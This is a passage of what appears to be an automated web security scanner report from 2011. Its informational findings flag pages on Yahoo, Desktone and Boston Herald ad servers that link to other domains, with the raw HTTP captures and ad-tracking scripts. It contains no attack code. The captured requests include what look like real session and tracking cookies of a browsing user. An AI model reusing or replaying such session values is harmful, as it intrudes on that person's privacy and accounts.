Set-Cookie: acb832834=![nC'208WMcbJO=)IE.8XG9mw?enc=AAAAAAAA0D8zMzMzMzPLPwAAAAAAABRAMzMzMzMzyz8AAAAAAADQP2R0GfmjPvdU7_________9j73NOAAAAAP7HBwACAgAAHgAAAAMAAACpIQUAiwMBAAEAAABVU0QAVVNEACwB-gAKJwAAzxEBAgUCAQUAAAAAbBwVWAAAAAA.&tt_code=2298003&click=http://g.ca.bid.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtjDEOwDAIA78SMXcAA47SN0XdOlX9e0HqdD7Z8Ii7nMM0PfIY4iij0ZJlViI0INx0IczBWIvSy.5mQmdbn6GYP6N43XtXZP8n1Pz9AHegFRs-%26redirectURL=&pixel=http://g.ca.bid.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26ex_uid=2_-17%26creativeID=112554%26message=eJwtjDEOwDAIA78SMXcAA47SN0XdOlX9e0HqdD7Z8Ii7nMM0PfIY4iij0ZJlViI0INx0IczBWIvSy.5mQmdbn6GYP6N43XtXZP8n1Pz9AHegFRs-%26managed=false&media_subtypes=1; path=/; expires=Sun, 18-Sep-2011 00:52:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6Ut0QkM9e5'Qr*jWzO3ob/1(cv<Js6rlVum*:>ocs@7M%8:t3eXJC@?K@i[>J`9NSLP`nwRLqx+G.JQ^]`)*kEk:!Ztw[w#w+(.tK<$?>V@zD>K?zVQUT]!=YY/3jrNv9QS)l*V=N3R]@b(Ybe%!.NEfla34biV:s%>8pI<jm38_hQ<=SycJFMywnGxXvE!Z?VPbGadJl!q; path=/; expires=Fri, 16-Dec-2011 00:52:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:52:51 GMT
Content-Length: 313

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=20&Z=300x250&s=2298003&r=1&_salt=1775927586&u=http%3A%2F%2Fwww.tmz.com%2F&u=http://www.tmz.com
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://p.rightaction.com/px?t=5&x=2&id=-17" width="1" height="1"/>');

17.98. http://images.search.yahoo.com/search/images  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.search.yahoo.com
Path:   /search/images

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/images;_ylt=A0oGdVOW73NOT1AA_hNXNyoA?p=xss&fr2=piv-web HTTP/1.1
Host: images.search.yahoo.com
Proxy-Connection: keep-alive
Referer: http://search.yahoo.com/search?p=xss&fr=ush_on_omg&ygmasrchbtn=Web+Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1; sSN=fMxSKNs2wWERAP_hjR1jxROmJRRewE7nSQq4InYrQ39WPlIZHdOmSQH25EenDjLtTv90XLaQRLjz2CbyON99uQ--

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:56:01 GMT
Set-Cookie: D=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 48951

<!DOCTYPE html><html><head><title> Image Search Results for xss</title><link rel="stylesheet" href="http://l.yimg.com/a/lib/s11/isyc_neo_srp_organic_201109150809.css"><script type="text/javascript">va
...[SNIP]...
<span class="cc-mr"><a target="_new" href="http://creativecommons.org/licenses/">(Learn more)</a>
...[SNIP]...
e+Scripting%2C+CWE-79+...&b=0&ni=30&no=0&tab=organic&sigr=125p4gp4r&sigb=12etar2qk&sigi=145bg4c4h&.crumb=qqGACKe7LYh' title='XSS in www.us.hsbc.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79 ...' ><img src='http://ts3.mm.bing.net/images/thumbnail.aspx?q=1139219825190&amp;id=031da0264b59eebea1aeb271fc7fce54' width='194' alt='' height='157' style='margin-left:-38px;' /></a>
...[SNIP]...
86%2C+Cross+Site+Scripting+...&b=0&ni=30&no=1&tab=organic&sigr=11vve9akl&sigb=12etar2qk&sigi=11cnpeq7h&.crumb=qqGACKe7LYh' title='HTTPi, SQLi, XSS.CX: XSS, CWE-79, CAPEC-86, Cross Site Scripting ...' ><img src='http://ts4.mm.bing.net/images/thumbnail.aspx?q=1169455197255&amp;id=15d9c6f1e15e729f86d0b16b2fe6ef7a' width='162' alt='' height='157' /></a>
...[SNIP]...
e+Full+Downloads+-+WarezForest.com&b=0&ni=30&no=2&tab=organic&sigr=129svcm5c&sigb=12etar2qk&sigi=117kmqoih&.crumb=qqGACKe7LYh' title='Another tutorial on XSS. - Free Full Downloads - WarezForest.com' ><img src='http://ts1.mm.bing.net/images/thumbnail.aspx?q=1165516476624&amp;id=1895073b1010873dbacab58508d280a4' width='201' alt='' height='157' style='margin-left:-44px;' /></a>
...[SNIP]...
rt+Bike+Images%3A+Xss+...&b=0&ni=30&no=3&tab=organic&sigr=12ml24h47&sigb=12etar2qk&sigi=11nvkls6q&.crumb=qqGACKe7LYh' title='Xss Dirt Bike Images: Xss Dirt Bike Images: Xss Dirt Bike Images: Xss ...' ><img src='http://ts3.mm.bing.net/images/thumbnail.aspx?q=1236127649550&amp;id=bc8e544aef3b6313ed7f7eca66acd967' width='174' alt='' height='157' style='margin-left:-17px;' /></a>
...[SNIP]...
Fxss%2F&size=66.6+KB&name=xss&p=xss&oid=3b8376c94a1c4bd0fa1a9f5f03700aec&fr2=piv-web&fr=&tt=xss&b=0&ni=30&no=4&tab=organic&sigr=1198bcn3k&sigb=12etar2qk&sigi=11bf46g7o&.crumb=qqGACKe7LYh' title='xss' ><img src='http://ts4.mm.bing.net/images/thumbnail.aspx?q=1222243463579&amp;id=1bfb59b582c3fd5d2fcb948c23f8377a' width='236' alt='' height='157' style='margin-left:-91px;' /></a>
...[SNIP]...
4c225c&fr2=piv-web&fr=&tt=Four+XSS+flaws+hit+Facebook+%7C+ZDNet&b=0&ni=30&no=5&tab=organic&sigr=1234sc4cf&sigb=12etar2qk&sigi=11q6qo8od&.crumb=qqGACKe7LYh' title='Four XSS flaws hit Facebook | ZDNet' ><img src='http://ts1.mm.bing.net/images/thumbnail.aspx?q=1167394151216&amp;id=7fc254e258fe9ec55c241d9e114a0aad' width='197' alt='' height='157' style='margin-left:-40px;' /></a>
...[SNIP]...
r2=piv-web&fr=&tt=IE8+XSS+Filter+bypasses+%7C+ethicalhack3r&b=0&ni=30&no=6&tab=organic&sigr=120su6nd8&sigb=12etar2qk&sigi=12daec99d&.crumb=qqGACKe7LYh' title='IE8 XSS Filter bypasses | ethicalhack3r' ><img src='http://ts4.mm.bing.net/images/thumbnail.aspx?q=1186868891759&amp;id=99ad73ddf22a8f466315e804e6f149a5' width='218' alt='' height='157' /></a>
...[SNIP]...
Vulnerability+%C2%AB+Spare+Clock+Cycles&b=0&ni=30&no=7&tab=organic&sigr=12dkg9i82&sigb=12etar2qk&sigi=120fchl1f&.crumb=qqGACKe7LYh' title='Gmail+Google Chrome XSS Vulnerability .. Spare Clock Cycles' ><img src='http://ts1.mm.bing.net/images/thumbnail.aspx?q=1230264277984&amp;id=ef7df1062f4cdb20a3b43b16cac162c2' width='271' alt='' height='157' style='margin-left:-34px;' /></a>
...[SNIP]...
b2881c0800a246af5e228b&fr2=piv-web&fr=&tt=Flow+chart+of+an+XSS+attack.&b=0&ni=30&no=8&tab=organic&sigr=119aohsfn&sigb=12etar2qk&sigi=11n2socjl&.crumb=qqGACKe7LYh' title='Flow chart of an XSS attack.' ><img src='http://ts1.mm.bing.net/images/thumbnail.aspx?q=1203388484092&amp;id=7cc5c82acb827b68501fc77c8e841622' width='221' alt='' height='157' /></a>
...[SNIP]...
S-wallpaper-1280x1024+...&b=0&ni=30&no=9&tab=organic&sigr=113rqh26v&sigb=12etar2qk&sigi=121k007k8&.crumb=qqGACKe7LYh' title='XSS-wallpaper-1024x768 XSS-wallpaper-1280x800 XSS-wallpaper-1280x1024 ...' ><img src='http://ts3.mm.bing.net/images/thumbnail.aspx?q=1238358107490&amp;id=607dfdac6a3f488f032b05aad059de2c' width='197' alt='' height='157' style='margin-left:-40px;' /></a>
...[SNIP]...
log+Archive+%C2%BB+XSS-Me+tool+%26amp%3B+html+frames&b=0&ni=30&no=10&tab=organic&sigr=11gglfqmd&sigb=12etar2qk&sigi=11ck1qfa7&.crumb=qqGACKe7LYh' title='Blog Archive .. XSS-Me tool &amp; html frames' ><img src='http://ts4.mm.bing.net/images/thumbnail.aspx?q=1156693951775&amp;id=cbee9daa558832904f12f114c07c68ae' width='268' alt='' height='157' style='margin-left:-37px;' /></a>
...[SNIP]...
org+web+application+security+lab&b=0&ni=30&no=11&tab=organic&sigr=11nf5r80s&sigb=12etar2qk&sigi=111hvrhnb&.crumb=qqGACKe7LYh' title='XSS in Google...s Orkut ha.ckers.org web application security lab' ><img src='http://ts1.mm.bing.net/images/thumbnail.aspx?q=1167426916888&amp;id=a5ab3e215a45752870f4b38ac8988020' width='216' alt='' height='157' style='margin-left:-71px;' /></a>
...[SNIP]...
9661c082757fd16ee695a6f&fr2=piv-web&fr=&tt=XSS+document.cookie+request&b=0&ni=30&no=12&tab=organic&sigr=121e1apmc&sigb=12etar2qk&sigi=124b7s7g9&.crumb=qqGACKe7LYh' title='XSS document.cookie request' ><img src='http://ts4.mm.bing.net/images/thumbnail.aspx?q=1169334472627&amp;id=d4a6a65ebd3ef32d56418b3fa6f0488e' width='202' alt='' height='157' style='margin-left:-46px;' /></a>
...[SNIP]...
tal+Satellite+System+XSS-11&b=0&ni=30&no=13&tab=organic&sigr=11nqoj3a8&sigb=12etar2qk&sigi=121gvvpsg&.crumb=qqGACKe7LYh' title='... Today Online - U.S. Air Force Experimental Satellite System XSS-11' ><img src='http://ts2.mm.bing.net/images/thumbnail.aspx?q=1186464536897&amp;id=4928a883b1fc6b8954586301f2e81989' width='247' alt='' height='157' /></a>
...[SNIP]...
main+elements+%28image+...&b=0&ni=30&no=14&tab=organic&sigr=11o3bq88c&sigb=12etar2qk&sigi=11ltg4k34&.crumb=qqGACKe7LYh' title='Figure 3: Blowup view of the XSS-10 spacecraft main elements (image ...' ><img src='http://ts3.mm.bing.net/images/thumbnail.aspx?q=1201776042534&amp;id=836d2beec1d30298ac841ea7ce1bd887' width='192' alt='' height='157' style='margin-left:-35px;' /></a>
...[SNIP]...
v-web&fr=&tt=xss+%7C+PHP+Application+and+Website+Defense&b=0&ni=30&no=15&tab=organic&sigr=113r96mr3&sigb=12etar2qk&sigi=11q4lenfd&.crumb=qqGACKe7LYh' title='xss | PHP Application and Website Defense' ><img src='http://ts2.mm.bing.net/images/thumbnail.aspx?q=1164322800521&amp;id=ad4ecc8139c14d0d0be5ef81c914fec7' width='157' alt='' height='173' /></a>
...[SNIP]...
%E5%8D%B7+by+XSS+%7C+Flickr+-+Photo+Sharing%21&b=0&ni=30&no=16&tab=organic&sigr=11qoi0j8v&sigb=12etar2qk&sigi=11oehf171&.crumb=qqGACKe7LYh' title='......120......... by XSS | Flickr - Photo Sharing!' ><img src='http://ts4.mm.bing.net/images/thumbnail.aspx?q=1261474953267&amp;id=8e048aa6d6a8355ec86704b4df86a1fa' width='157' alt='' height='162' /></a>
...[SNIP]...
orm+Case+Sealer+%7C+Taping+...&b=0&ni=30&no=17&tab=organic&sigr=11hbhdnpo&sigb=12etar2qk&sigi=11nth66r4&.crumb=qqGACKe7LYh' title='Little David LD-Xss Semi-Automatic Uniform Case Sealer | Taping ...' ><img src='http://ts4.mm.bing.net/images/thumbnail.aspx?q=1199354881855&amp;id=6ddcae7a781aea29cd0ef1fadf8c7340' width='157' alt='' height='171' /></a>
...[SNIP]...
e+Scripting+%28XSS%29+Vulnerability&b=0&ni=30&no=18&tab=organic&sigr=11lfkk1sh&sigb=12etar2qk&sigi=11m72lp7n&.crumb=qqGACKe7LYh' title='NTA Monitor - Sawmill Cross Site Scripting (XSS) Vulnerability' ><img src='http://ts4.mm.bing.net/images/thumbnail.aspx?q=1165042199211&amp;id=2c9c4fe0566046d832eb0ab4cb503bac' width='293' alt='' height='157' style='margin-left:-30px;' /></a>
...[SNIP]...
+Justin.tv+infects+2%2C525+profiles+%7C+ZDNet&b=0&ni=30&no=19&tab=organic&sigr=12imp14rb&sigb=12etar2qk&sigi=11h8u7jug&.crumb=qqGACKe7LYh' title='XSS worm at Justin.tv infects 2,525 profiles | ZDNet' ><img src='http://ts2.mm.bing.net/images/thumbnail.aspx?q=1231653570869&amp;id=073f9c8d487d5e220ee6f90f554cc74a' width='300' alt='' height='150' style='margin-left:-155px;' /></a>
...[SNIP]...
ustration+of+XSS+vulnerability+on+facebook.com.&b=0&ni=30&no=20&tab=organic&sigr=11p3giva4&sigb=12etar2qk&sigi=11s1h8gc4&.crumb=qqGACKe7LYh' title='Illustration of XSS vulnerability on facebook.com.' ><img src='http://ts3.mm.bing.net/images/thumbnail.aspx?q=1187245661342&amp;id=f93d94aff89059793cb547512a896b6f' width='170' alt='' height='157' /></a>
...[SNIP]...
over+For%2CCover+for+...&b=0&ni=30&no=21&tab=organic&sigr=1381da3om&sigb=12etar2qk&sigi=12hhhsk4s&.crumb=qqGACKe7LYh' title='Frame Cover for iPhone 4G (XSS-110) - China Frame Cover For,Cover for ...' ><img src='http://ts1.mm.bing.net/images/thumbnail.aspx?q=1231119327604&amp;id=f708a76fe24900a1f751be451f1a9e11' width='157' alt='' height='157' /></a>
...[SNIP]...
SS+Me+Warnings+-+real+XSS+issues%3F+-+efreedom&b=0&ni=30&no=22&tab=organic&sigr=123i0vdng&sigb=12etar2qk&sigi=118glj4uj&.crumb=qqGACKe7LYh' title='PHP - XSS Me Warnings - real XSS issues? - efreedom' ><img src='http://ts2.mm.bing.net/images/thumbnail.aspx?q=1148388583657&amp;id=c4897616c29e56560055e414d6fee52b' width='162' alt='' height='157' /></a>
...[SNIP]...
web&fr=&tt=XSS%3A+Expert+Software+Solutions+-+Downloads&b=0&ni=30&no=23&tab=organic&sigr=113rqh26v&sigb=12etar2qk&sigi=120oi9v3q&.crumb=qqGACKe7LYh' title='XSS: Expert Software Solutions - Downloads' ><img src='http://ts1.mm.bing.net/images/thumbnail.aspx?q=1249363691808&amp;id=0ae325cd529f2691b5edf5cb75d98ca0' width='252' alt='' height='157' style='margin-left:-107px;' /></a>
...[SNIP]...
ripting%2C+CWE-79%2C+CAPEC-86&b=0&ni=30&no=24&tab=organic&sigr=12f1eb0ri&sigb=12etar2qk&sigi=117vp7d35&.crumb=qqGACKe7LYh' title='XSS in mail.google.com, DORK, Cross Site Scripting, CWE-79, CAPEC-86' ><img src='http://ts2.mm.bing.net/images/thumbnail.aspx?q=1200302325865&amp;id=6e4dfa1eff8a341f1f8ef5adea1e8433' width='287' alt='' height='157' style='margin-left:-36px;' /></a>
...[SNIP]...
.html+XSS+%28Page+1%29+-+General+-+Forum&b=0&ni=30&no=25&tab=organic&sigr=11lm8cstb&sigb=12etar2qk&sigi=11hhcjols&.crumb=qqGACKe7LYh' title='DansGuardian template.html XSS (Page 1) - General - Forum' ><img src='http://ts1.mm.bing.net/images/thumbnail.aspx?q=1189403887408&amp;id=cada1f9756ff53b6b4543441a61e1460' width='207' alt='' height='157' style='margin-left:-62px;' /></a>
...[SNIP]...
v-web&fr=&tt=Project+N-XSS+Rendering+-+Lateral-g+Forums&b=0&ni=30&no=26&tab=organic&sigr=11nehqm22&sigb=12etar2qk&sigi=11c4sl7st&.crumb=qqGACKe7LYh' title='Project N-XSS Rendering - Lateral-g Forums' ><img src='http://ts4.mm.bing.net/images/thumbnail.aspx?q=1200384115751&amp;id=6cc83170d2644dcef780eab4c715a99e' width='280' alt='' height='157' style='margin-left:-135px;' /></a>
...[SNIP]...
njection+or+XSS+Injection&b=0&ni=30&no=27&tab=organic&sigr=120pg1b4t&sigb=12etar2qk&sigi=12t8ds89n&.crumb=qqGACKe7LYh' title='... sure of this this thing. Whether is a SQL Injection or XSS Injection' ><img src='http://ts3.mm.bing.net/images/thumbnail.aspx?q=1155512795922&amp;id=5f16f45aa7a7af3a30fcf6380af6b9f9' width='300' alt='' height='155' style='margin-left:-24px;' /></a>
...[SNIP]...
+Exploit+found+on+Apple+iTunes+site%E2%80%A6+again&b=0&ni=30&no=28&tab=organic&sigr=12chu9o56&sigb=12etar2qk&sigi=11qlnuuu4&.crumb=qqGACKe7LYh' title='XSS Exploit found on Apple iTunes site... again' ><img src='http://ts3.mm.bing.net/images/thumbnail.aspx?q=1131524865154&amp;id=4fad026520ebc9b071007fae390a0fb0' width='258' alt='' height='157' style='margin-left:-42px;' /></a>
...[SNIP]...
nds%2F&size=41.4+KB&name=xss&p=xss&oid=4cc30d8af3ca9784915078a388b12095&fr2=piv-web&fr=&tt=xss&b=0&ni=30&no=29&tab=organic&sigr=12ajiqikn&sigb=12etar2qk&sigi=11pkegblh&.crumb=qqGACKe7LYh' title='xss' ><img src='http://ts3.mm.bing.net/images/thumbnail.aspx?q=1220133655074&amp;id=533ba3524999735330d90c6ccb7abd12' width='199' alt='' height='157' /></a>
...[SNIP]...

17.99. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.desktone.com
Path:   /gaw.hosted.virtual.desktop.free.trial.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /gaw.hosted.virtual.desktop.free.trial.html?_kk=VDI&_kt=31d1a2bd-f653-42ac-b143-8a094cde83dc&gclid=COryhqeCo6sCFTEaQgodYAJH4g HTTP/1.1
Host: info.desktone.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:25:17 GMT
Server: Apache
Vary: *,Accept-Encoding
Content-Length: 31655
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<div id="footer" class="group">
<script type="text/javascript" src="http://munchkin.marketo.net/js/munchkin.js"></script>
...[SNIP]...
<li class="linked_in">

                           <a href="http://www.linkedin.com/company/desktone-inc.?trk=null">LinkedIn</a>
...[SNIP]...
<li class="twitter">
                           <a href="http://twitter.com/desktone">Twitter</a>
...[SNIP]...
<li class="facebook last">
                           <a href="http://www.facebook.com/Desktone">Facebook</a>
...[SNIP]...
<span class="addthis_toolbox addthis_default_style">
                                   <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=desktone" class="addthis_button_compact">Share</a>
...[SNIP]...
</script>

                               <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=desktone"></script>
...[SNIP]...
</BODY> tag -->
<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...

17.100. http://l.yimg.com/l/social_buttons/facebook-share-iframe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /l/social_buttons/facebook-share-iframe.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /l/social_buttons/facebook-share-iframe.php?u=http%3A%2F%2Fomg.yahoo.com%2Fphotos%2Fwhat-were-they-thinking%2F5203&t=&l=Share HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:53 GMT
Cache-Control: max-age=300, public
Expires: Tue, 14 Sep 2021 00:52:53 GMT
Content-Type: text/html; charset=utf-8
Age: 133
Content-Length: 2259
Proxy-Connection: keep-alive
Server: YTS/1.19.5

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/3.1.1/build/cssreset/reset-min.css">
<style>
...[SNIP]...
</a>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

17.101. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/national/remembering_911/home/L24/1480354666/Right/BostonHerald/Pictopia_160x600_House/Pictopia-160x600.jpg/4d686437616b35776e72734144666853  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/national/remembering_911/home/L24/1480354666/Right/BostonHerald/Pictopia_160x600_House/Pictopia-160x600.jpg/4d686437616b35776e72734144666853

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/national/remembering_911/home/L24/1480354666/Right/BostonHerald/Pictopia_160x600_House/Pictopia-160x600.jpg/4d686437616b35776e72734144666853?x HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.24.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 01:36:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.buyheraldphotos.com
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.buyheraldphotos.com">here</a>.</p>
<
...[SNIP]...

17.102. http://omg.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /search?p=xss&fr=ush_on_omg HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; tiles=15048; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1; aDxT=0.10422400059178472

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:57:20 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5061

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<a href="http://us.rd.yahoo.com/500/*http://www.yahoo.com"><img src=http://us.i1.yimg.com/us.yimg.com/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a>
...[SNIP]...

17.103. http://omg.yahoo.com/xhr/ad/LREC/2115806991  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /xhr/ad/LREC/2115806991

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:51 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 1
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5021

<html><body><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=v0zEHmKIOPqdxiLuTnPvXhRLMhd7ak5z72MAAaAs&ad_type=iframe&ad_size=300x250&site=140437&section_code=14445066&cb=1316220771165781&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15qfc9jd1/M=787833.14445066.14291829.1444484/D=o_m_g/S=2115806991:LREC/Y=YAHOO/EXP=1316227971/L=v0zEHmKIOPqdxiLuTnPvXhRLMhd7ak5z72MAAaAs/B=13.5RdGDJG8-/J=1316220771165781/K=v3AjaYUpNSmMaKWqK8BUpA/A=6261153/R=0/*"></IFRAME>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128in6aqd(gid$v0zEHmKIOPqdxiLuTnPvXhRLMhd7ak5z72MAAaAs,st$1316220771080696,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

17.104. http://omg.yahoo.com/xhr/ad/LREC/2115806991  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /xhr/ad/LREC/2115806991

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

